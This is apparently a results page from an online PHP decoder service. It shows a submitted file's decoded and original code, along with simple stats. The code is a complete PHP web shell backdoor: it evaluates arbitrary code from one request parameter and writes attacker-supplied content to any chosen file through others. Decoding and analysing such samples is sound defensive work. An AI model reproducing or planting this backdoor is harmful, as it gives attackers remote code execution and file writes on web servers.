Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $nmwx = "0da592fe3b453817111f81f79071f7ed"; if(isset($_REQUEST['zpreyxb'])) { ..
Decoded Output download
<?php
$nmwx = "0da592fe3b453817111f81f79071f7ed";
if(isset($_REQUEST['zpreyxb'])) {
$tahqnegs = $_REQUEST['zpreyxb'];
eval($tahqnegs);
exit();
}
if(isset($_REQUEST['tlnohsus'])) {
$iqyukxj = $_REQUEST['chye'];
$senjs = $_REQUEST['tlnohsus'];
$qknkwby = fopen($senjs, 'w');
$utwn = fwrite($qknkwby, $iqyukxj);
fclose($qknkwby);
echo $utwn;
exit();
}
?>
Did this file decode correctly?
Original Code
<?php
$nmwx = "0da592fe3b453817111f81f79071f7ed";
if(isset($_REQUEST['zpreyxb'])) {
$tahqnegs = $_REQUEST['zpreyxb'];
eval($tahqnegs);
exit();
}
if(isset($_REQUEST['tlnohsus'])) {
$iqyukxj = $_REQUEST['chye'];
$senjs = $_REQUEST['tlnohsus'];
$qknkwby = fopen($senjs, 'w');
$utwn = fwrite($qknkwby, $iqyukxj);
fclose($qknkwby);
echo $utwn;
exit();
}
?>
Function Calls
fopen | 1 |
fwrite | 1 |
Stats
MD5 | 01af9d6f18c8eb1a2ae90d6a63026092 |
Eval Count | 0 |
Decode Time | 50 ms |